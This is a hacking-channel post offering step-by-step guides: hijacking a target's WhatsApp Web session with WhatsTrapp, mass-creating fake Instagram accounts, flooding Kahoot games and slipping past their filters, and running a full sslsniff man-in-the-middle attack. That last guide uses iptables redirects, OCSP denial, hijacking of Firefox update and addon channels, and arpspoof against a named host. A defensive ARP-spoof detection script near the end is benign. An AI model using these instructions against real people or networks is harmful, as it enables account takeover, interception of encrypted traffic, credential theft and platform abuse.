UNDERCODE COMMUNITY

🦑 WHATSAPP HACKING updated ✅

WhatsTrapp uses a Man-in-the-Middle (MITM) attack to establish a session with the target's WhatsApp: once the session has been established, actions for retrieving and collecting the data are executed in the browser context by using the very same WhatsApp Web APIs (thanks to a bit of reverse engineering).

🦑 REQUIREMENTS:

Docker
Docker Compose

🦑 git clone git@github.com:Wicker25/whatstrapp.git

1) $ cd whatstrapp/

2) Launch the WhatsTrapp server with:

$ docker-compose up
Then open your browser at http://127.0.0.1:8025/ and wait until the QR code has been loaded.

3) Launch the target's WhatsApp and, from the main menu, select "WhatsApp Web".

4) If you are trying to use WhatsTrapp on a GNU/Linux operating system you might need to increase the kernel parameter max_map_count by running:

# sysctl -w vm.max_map_count=262144

▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 SOME COUNTRIES HAVE TROUBLE LOADING YOUTUBE VIDEOS, DUE TO SYSTEM MAINTENANCE, NOT DDOS
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁

🦑 CREATE UNLIMITED INSTAGRAM ACCOUNTS:
t.me/UndercodeTesting

🦑 INSTALLATION & RUN:

1) git clone https://github.com/kaex/Insta-mass-account-creator.git

2) cd Insta-mass-account-creator

3) Example: php start.php -l 5 -p proxies.txt

4) This script creates accounts with a random name and username fetched from the web. All users created are over 18 years old.

5) This script helps you follow multiple accounts with the accounts you've created.

Important:

6) A new fake Instagram account with an unverified phone number cannot make any requests after ~1-24 hours. All requests will be redirected to the page
https://instagram.com/challenge

🦑 TESTED BY UNDERCODE

> debian-parrot-kali

▁ ▂ ▄ UNDERCODE ▄ ▂ ▁

🦑 Reverse engineering termux-linux:
t.me/UndercodeTesting

1) kahoot-flood - using an old school denial of service technique, this program automatically joins a game of kahoot an arbitrary number of times. For instance, you can register the nicknames "alex1", "alex2", ..., "alex100".
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-flood

2) kahoot-rand - connect to a game an arbitrary number of times (e.g. 100) and answer each question randomly. If you connect with enough names, one of them is bound to win.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-rand

3) kahoot-profane - circumvent Kahoot's profanity detector, allowing you to join with any nickname (but with extra length restrictions; it has to be short).
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-profane

4) kahoot-play - play kahoot regularly—as if you were using the online client.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-play

5) kahoot-html - I have notified Kahoot and they have fixed this issue. It used to allow you to join a game of kahoot a bunch of times with HTML-rich nicknames. This messes with the lobby of a kahoot game. See the screenshot in the example section.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-html

6) kahoot-crash - trigger an exception on the host's computer. This no longer prevents the game from functioning, so it is a rather pointless "hack"
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-crash

7) kahoot-xss - since I discovered this security hole, I contacted Kahoot and they fixed it. This used to run arbitrary JavaScript code on the host's computer. This exploited a bug with the pre-game player list, which did not sanitize HTML tags. The exploit itself was rather complicated due to the fact that nicknames are limited to 15 characters.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-xss

🦑 INSTALLATION & RUN:

1) First, you must have the Go programming language INSTALLED on your machine.

Once you have Go installed and a GOPATH configured, you can use the following command to install the dependencies:

2) go get github.com/gorilla/websocket

🦑 Android
Download Termux on your Android device and type these commands:

> apt update

> apt install curl

> curl https://raw.githubusercontent.com/unixpickle/kahoot-hack/master/kh-tmux-setup.sh > kh-tmux-setup.sh

> chmod +x kh-tmux-setup.sh

> ./kh-tmux-setup.sh

✅ verified by undercoder

▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission

OFFICIAL NSA SITE:

> https://www.ghidra-sre.org/ghidra_9.1.2_PUBLIC_20200212.zip
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁

🦑 Software reverse engineering by NSA

🦑 INSTALLATION & RUN:

1) Extract the JDK: dl

2) Right-click on the zip file and click Extract All...

3) Click Extract

4) Open Environment Variables window:

5) Windows 10: Right-click on Windows start button, and click System

Windows 7: Click Windows start button, right-click on Computer, and click Properties

6) Click Advanced system settings

7) Click Environment variables...

8) Add the JDK bin directory to the PATH variable:

9) Under System variables, highlight Path and click Edit...

10) At the end of the Variable value field, add a semicolon followed by <path of extracted JDK dir>\bin
Click OK
Click OK
Click OK

11) Restart any open Command Prompt windows for changes to take effect

Linux and macOS (OS X): Extract the JDK distribution (.tar.gz file) to your desired location, and add the JDK's bin directory to your PATH:

12) Extract the JDK:
tar xvf <JDK distribution .tar.gz>

13) Open ~/.bashrc with an editor of your choice. For example:
vi ~/.bashrc

14) At the very end of the file, add the JDK bin directory to the PATH variable:
export PATH=<path of extracted JDK dir>/bin:$PATH
Save file

15) Restart any open terminal windows for changes to take effect

🦑 In some cases, you may want Ghidra to launch with a specific version of Java instead of the version that Ghidra automatically locates. To force Ghidra to launch with a specific version of Java, set the JAVA_HOME_OVERRIDE property in the support/launch.properties file. If this property is set to an incompatible version of Java, Ghidra will revert to automatically locating a compatible version. Note that some Java must still be on the PATH in order for Ghidra to use the JAVA_HOME_OVERRIDE property. This limitation will be addressed in a future version of Ghidra.

▁ ▂ ▄ UNDERCODE ▄ ▂ ▁

🦑 CIA TOOL - GodMode9 Explorer - A full access file browser for the Nintendo 3DS console
T.me/UndercodeTesting

🦑 The recommended bootloader for use with GodMode9 is fastboot3DS. There are known issues for some users when using the standard setup based on boot9strap and Luma3DS. If you insist on using that setup follow the instructions found in a certain guide. Here's how to set up GodMode9 (and fastboot3DS) quickly:

1) Download OpenFirmInstaller and follow the quick setup instructions found there.
> https://github.com/d0k3/GodMode9

2) Copy the gm9 folder from the release archive to your SD card. Then, get good versions of seeddb.bin and encTitleKeys.bin from somewhere (don't ask me!) and put these two files into sd:/gm9/support (optional but recommended for full functionality).
It is also recommended you setup the RTC clock if you're running GodMode9 for the first time.

3) Find the option via HOME button -> More.... Also keep in mind that you should fix your system OS clock afterwards. While you're in the More... menu, you may also set screen brightness to a fixed value of your choosing and manually calibrate the touch screen (not recommended - try the automatic configuration first).
Helpful hint #1: Go here for step by steps on doing some common tasks in GodMode9. Especially users coming from Decrypt9WIP or Hourglass9 may find this to be helpful.
Helpful hint #2: Never unlock the red write permission level unless you know exactly what you're doing.

4) You will notice that prompt when it comes up, it features a completely red screen. It is recommended you stay on the yellow permission level or below at all times to be completely safe. Also read more on the write permissions system below.

🦑 <A> button: The <A> button is the 'confirm' / 'choose' button. It confirms prompts and selects entries in menus. In the main file view, it pulls up a submenu for files and opens directories (use <R+A> on directories for a submenu, also including the invaluable title search). In the hexviewer, <A> switches into edit mode.

<B> button: The <B> button is the 'cancel' / 'return' button. Use it to leave menus without action, hold it on file operations to cancel said file operations.

<X> button: In the main file view, the <X> button deletes (marked) files. With <R+X> files are renamed.

<Y> button: In the main file view, the <Y> button copies and pastes files. With <R+Y> you can create folders and dummy files.

<L> button: The <L> button is the 'mark' button. Use it with <LEFT> / <RIGHT> to mark / unmark all files in a folder, hold it and use <UP> / <DOWN> to select multiple files.

<R> button: The <R> button is the 'switch' button. It switches buttons to their secondary function. Notable exceptions are <R+L> for a screenshot (works almost anywhere), <R+LEFT> / <R+RIGHT> to switch panes and <R+DOWN> to reload the file listing.

<START> button: Use the <START> button to reboot from GodMode9. Use <R+START> to poweroff your 3DS.

<SELECT> button: The <SELECT> button clears or restores the clipboard (depending on if it's empty or not).

<HOME> button: The <HOME> button enters the HOME menu, including the scripts / payloads submenus, options for formatting the SD, setting the RTC, and more. The <POWER> button is an alternative way of entering the HOME menu.

<R+UP> combo: This little known keycombo, when held at startup, pauses the GodMode9 boot so that you can stare at the splash screen for a little longer.

<R+LEFT> combo: If you have installed GodMode9 as your bootloader, this keycombo enters the bootmenu. Hold on startup! If you built GodMode9 as SALTMODE and have it as a bootloader, the keycombo is simply the <START> button.

@undercodeTesting
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁

🦑 HACK WIFI AIRPLANE
> Using SSH through airplane WiFi that blocks port 22
instagram.com/UndercodeTesting

1) Many aircraft that offer wifi only permit access to machines on port 80/443, the standard http(s) ports. If you want to SSH, you have to set up an intermediate machine that hosts the SSH service on either port 80 or 443. An easy (and free) way to do this is via a Google free-tier micro instance.

2) These instances have a 1 GB transfer ceiling per month, but so long as you are only transmitting textual data a few days per month, this limit should not be easily exceeded. Set up one of these VMs via the Google Cloud console, and select CentOS 7 as the disk image. Make sure that you allow http/https traffic on the instance, using the two checkboxes in the Firewalls section of the VM settings.

3) Optionally, set a static external IP address for your server in the VM config, in case you don't want to look up the IP each time. Then, ssh into the new VM (the IP address will be listed as the "external IP" in the list of instances) and edit your /etc/ssh/sshd_config file, changing the Port 22 line to Port 80.

4) By default SELinux will only allow the SSH service to use port 22, so you have to change your SELinux permissions as well. Enter the following commands into the VM:

> sudo su

> semanage port -m -t ssh_port_t -p tcp 80

> firewall-cmd --permanent --zone=public --add-port=80/tcp

> firewall-cmd --reload

> systemctl restart sshd.service

Make sure that SSH is listening on port 80:

> ss -tnlp | grep ssh

Example output:

LISTEN 0 128 *:80 *:* users:(("sshd",pid=1895,fd=3))
LISTEN 0 128 :::80 :::* users:(("sshd",pid=1895,fd=4))

If so, log out and attempt to SSH into your server on the new port:

> ssh 123.45.67.89 -p80

@undercodeTesting
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁

🦑 AUTOMATE MITM ATTACK - HACK ACC AND MORE...
T.me/UndercodeTesting

🦑 REQUIRE:

openssl, libboost1.35-dev, libboost-filesystem1.35-dev,

libboost-thread1.35-dev, liblog4cpp5-dev, Linux 2.4/2.6 (or BSD)

🦑 INSTALLATION & RUN:

1) git clone https://github.com/moxie0/sslsniff.git

2) run "./configure" and "make". (You'll have
to make some changes to build on BSD systems, see below under "Setting up
pf")

🦑 There are two ways to run this: in "authority" mode or "targeted" mode.

A) Authority Mode:

1) In this mode, sslsniff acts as if it is a CA which dynamically generates
certificates on the fly. If you were, for instance, able to obtain a CA
certificate somehow, you could run it in this mode and it would dynamically
create and sign new certificates for whatever site you're trying to connect
to.

2) This mode is also useful for exploiting implementations that do not properly
verify BasicConstraints, as any valid leaf node certificate could be used
instead of a CA cert.

3) You would run sslsniff as:
./sslsniff -a -s <$listenPort> -w <$logFile> -c <$caCert>

B) Targeted Mode:

1) In this mode, sslsniff is given a directory full of certificates, which it
uses for targeted MITM attacks against the hosts those certificates are
signed for.

2) This mode is useful if you are able to forge specific
certificates, or if you have certificates that were obtained for the "null
prefix" vulnerability that I published. There are sample null prefix
certificates in the "certs" directory that comes with sslsniff, but be
sure to specify "-m IPSCACLASEA1.crt" if you wish to use those. (Note:
the targeted certs have been removed for legal reasons, but the universal
wildcard cert remains)

3) You would run sslsniff as:
./sslsniff -t -s <$listenPort> -w <$logFile> -m IPSCACLASEA1.crt \
-c <$certDir>


@undercodeTesting
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 MITM AUTO Other options:

* sslsniff can be configured to only attack certain clients. In this case,
you need to specify -f <ff,ie,safari,opera> -h <$httpListenPort>

* sslsniff can be configured to deny OCSP requests from clients. In this
case, you need to specify -d

* sslsniff can be configured to only log HTTP POSTS. In this case, you
need to specify -p

* sslsniff can be configured to hijack Mozilla auto-updates. In this case,
you need to specify -u <$updateXmlDir>, where $updateXmlDir contains the
XML files for whatever binaries you want to have sslsniff auto-update,
one for each platform. There are sample XML files in the "update"
directory that comes with sslsniff.

* sslsniff can be configured to hijack Firefox/Thunderbird addon
auto-updates. In this case, you need to specify -e <url> -j <sha256sum>
where <url> is the URL where your custom addon is located, and <sha256sum>
is the sha256sum of that addon.
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁

🦑 AUTO MITM SETTING UP:
Setting up iptables
-------------------

1) Flip your machine into ip_forward mode
(echo 1 > /proc/sys/net/ipv4/ip_forward)

2) Add a rule to intercept HTTPS traffic
(iptables -t nat -A PREROUTING -p tcp --destination-port 443 \
-j REDIRECT --to-ports <$listenPort>)

3) If you're going to do client fingerprinting, add a rule to
intercept HTTP traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 80 \
-j REDIRECT --to-ports <$httpListenPort>)

4) Add a rule to intercept imaps traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 993 \
-j REDIRECT --to-ports <$listenPort>)

5) Add a rule to intercept pop3s traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 995 \
-j REDIRECT --to-ports <$listenPort>)

6) Add a rule to intercept irc over ssl traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 6697 \
-j REDIRECT --to-ports <$listenPort>)

🦑 Setting up pf
-------------

1) Basic support for pf is now included. Set up firewall rules similar to
those above, and change util/Destination.cpp by undefining HAVE_NETFILTER
and defining HAVE_PF at the top.

🦑 Running arpspoof
--------------------------

1) Assuming we want to intercept SSL traffic from 172.17.10.36, we need to
trick that host into thinking that we're the router. Using arpspoof, we
can convince the target that the router's MAC address is our MAC address.

2) arpspoof -i eth0 -t 172.17.10.36 172.17.8.1

At this point, any SSL traffic should get proxied by sslsniff and logged to
a file.


✅ VERIFIED BY UNDERCODE
@undercodeTesting
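
Seen from the defender's side, the arpspoof step above shows up in the victim's neighbour table as the router's IP suddenly mapping to another host's MAC address. The following Python is an added example, not part of the original post or of sslsniff; it checks constructed `ip neigh show` snapshots (the MAC addresses and the host 172.17.10.99 are made up) for that pattern.

```python
import re
from collections import defaultdict

GATEWAY = "172.17.8.1"  # router address used in the post above

# Constructed `ip neigh show` snapshots taken on 172.17.10.36; the MAC
# addresses and the neighbour 172.17.10.99 are made up for this example.
SNAPSHOTS = [
    "172.17.8.1 dev eth0 lladdr 00:16:3e:aa:00:01 REACHABLE\n"
    "172.17.10.99 dev eth0 lladdr 00:16:3e:bb:00:99 STALE\n",
    "172.17.8.1 dev eth0 lladdr 00:16:3E:BB:00:99 REACHABLE\n"
    "172.17.10.99 dev eth0 lladdr 00:16:3e:bb:00:99 REACHABLE\n"
    "172.17.10.40 dev eth0  FAILED\n",
]

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+\S+\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})(?:\s|$)",
    re.IGNORECASE,
)

def parse_neigh(text):
    """Return {ip: mac} for entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        match = NEIGH_RE.match(line.strip())
        if match:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            table[match["ip"]] = match["mac"].lower()
    return table

def find_arp_anomalies(snapshots, gateway=GATEWAY):
    """Return (snapshot_index, kind, ip, mac) alerts for suspicious bindings."""
    alerts, known = [], {}
    for index, text in enumerate(snapshots):
        table = parse_neigh(text)
        # Check 1: an IP that was bound to one MAC now answers with another.
        for ip, mac in table.items():
            if ip in known and known[ip] != mac:
                kind = "gateway-mac-changed" if ip == gateway else "mac-changed"
                alerts.append((index, kind, ip, mac))
        # Check 2: the gateway's current MAC is also claimed by another host.
        owners = defaultdict(set)
        for ip, mac in table.items():
            owners[mac].add(ip)
        suspects = owners.get(table.get(gateway), set()) - {gateway}
        for ip in sorted(suspects):
            alerts.append((index, "shares-gateway-mac", ip, table[ip]))
        known.update(table)
    return alerts

if __name__ == "__main__":
    for alert in find_arp_anomalies(SNAPSHOTS):
        print(alert)
```

A changed gateway MAC can also come from router replacement or failover, so treat these alerts as triage input; a static ARP entry for the gateway or switch-level dynamic ARP inspection removes the ambiguity.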
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 FULL AUTOMATE MITM ATTACK